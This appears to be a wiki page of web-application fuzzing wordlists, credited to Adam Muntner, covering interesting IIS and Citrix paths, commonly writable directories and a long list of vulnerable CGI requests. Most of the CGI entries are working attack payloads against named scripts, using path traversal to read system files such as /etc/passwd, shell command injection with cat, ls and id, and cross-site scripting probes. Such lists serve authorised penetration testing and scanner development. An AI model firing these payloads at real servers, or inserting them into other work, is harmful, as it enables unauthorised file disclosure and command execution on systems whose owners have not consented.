/scripts/convert.bas&lt;br /&gt;
/cgi-bin/htmlscript&lt;br /&gt;
/scripts/counter.exe&lt;br /&gt;
/scripts/no-such-file.pl&lt;br /&gt;
/cgi&lt;br /&gt;
/scripts/iisadmin/ism.dll?http/dir&lt;br /&gt;
/scripts/samples/search/webhits.exe&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Commonly writable directories (6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;#Commonly writable directories&lt;br /&gt;
 (6 April, 2009)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft URLs (18 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Interesting IIS Files &amp;amp; Directories (17 March, 2009)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
# Look at the result codes in the headers - 403 likely mean the dir exists, 404  means not. It takes an ISAPI filter for IIS to return 404's for 403s. &lt;br /&gt;
# Altetrnatively, slight differences in the number of bytes returned will help differentiate.&lt;br /&gt;
&lt;br /&gt;
.printer&lt;br /&gt;
/%NETHOOD%/&lt;br /&gt;
/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.aspx&lt;br /&gt;
/Exadmin/&lt;br /&gt;
/ExchWeb/&lt;br /&gt;
/Exchange/&lt;br /&gt;
/Microsoft-Server-ActiveSync/&lt;br /&gt;
/OMA/&lt;br /&gt;
/OWA/&lt;br /&gt;
/Public/&lt;br /&gt;
/_layouts/alllibs.htm&lt;br /&gt;
/_layouts/settings.htm&lt;br /&gt;
/_layouts/userinfo.htm&lt;br /&gt;
/_vti_bin/&lt;br /&gt;
/_vti_bin/_vti_aut/fp30reg.dll&lt;br /&gt;
/_vti_pvt/&lt;br /&gt;
/_WEB_INF/&lt;br /&gt;
/a%5c.aspx&lt;br /&gt;
/adovbs.inc&lt;br /&gt;
/aspnet_files/&lt;br /&gt;
/certcontrol/&lt;br /&gt;
/certenroll/&lt;br /&gt;
/certsrv/&lt;br /&gt;
/exchange/root.asp&lt;br /&gt;
/forum.asp&lt;br /&gt;
/forum_arc.asp&lt;br /&gt;
/forum_professionnel.asp&lt;br /&gt;
/iisadmin/&lt;br /&gt;
/iishelp/&lt;br /&gt;
/iishelp/iis/misc/default.asp&lt;br /&gt;
/iissamples/&lt;br /&gt;
/imprimer.asp&lt;br /&gt;
/includes/adovbs.inc&lt;br /&gt;
/msadc/&lt;br /&gt;
/null.htw&lt;br /&gt;
/pbserver/pbserver.dll&lt;br /&gt;
/postinfo.html&lt;br /&gt;
/rubrique.asp&lt;br /&gt;
/scripts/&lt;br /&gt;
/share/&lt;br /&gt;
/tsweb/&lt;br /&gt;
/~/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.asp&lt;br /&gt;
/~/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.aspx&lt;br /&gt;
index.shtml&lt;br /&gt;
x.htw&lt;br /&gt;
x.ida&lt;br /&gt;
x.idq&lt;br /&gt;
/citrix/&lt;br /&gt;
/citrix/AccessPlatform/auth/&lt;br /&gt;
/citrix/AccessPlatform/auth/clientscripts/&lt;br /&gt;
/AccessPlatform/auth/clientscripts/&lt;br /&gt;
/AccessPlatform/&lt;br /&gt;
/AccessPlatform/auth/&lt;br /&gt;
/AccessPlatform/auth/clientscripts/cookies.js &lt;br /&gt;
/AccessPlatform/auth/clientscripts/login.js &lt;br /&gt;
/Citrix//AccessPlatform/auth/clientscripts/cookies.js &lt;br /&gt;
/Citrix/AccessPlatform/auth/clientscripts/login.js &lt;br /&gt;
/Citrix/PNAgent/config.xml&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
search.php?searchstring=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl&lt;br /&gt;
search.pl?Realm=All&amp;amp;Match=0&amp;amp;Terms=test&amp;amp;nocpp=1&amp;amp;maxhits=10&amp;amp;;Rank=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
search/search.cgi?keys=*&amp;amp;prc=any&amp;amp;catigory=../../../../../../../../../../../../etc&lt;br /&gt;
sendform.cgi&lt;br /&gt;
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message&lt;br /&gt;
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
session/adminlogin&lt;br /&gt;
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}&lt;br /&gt;
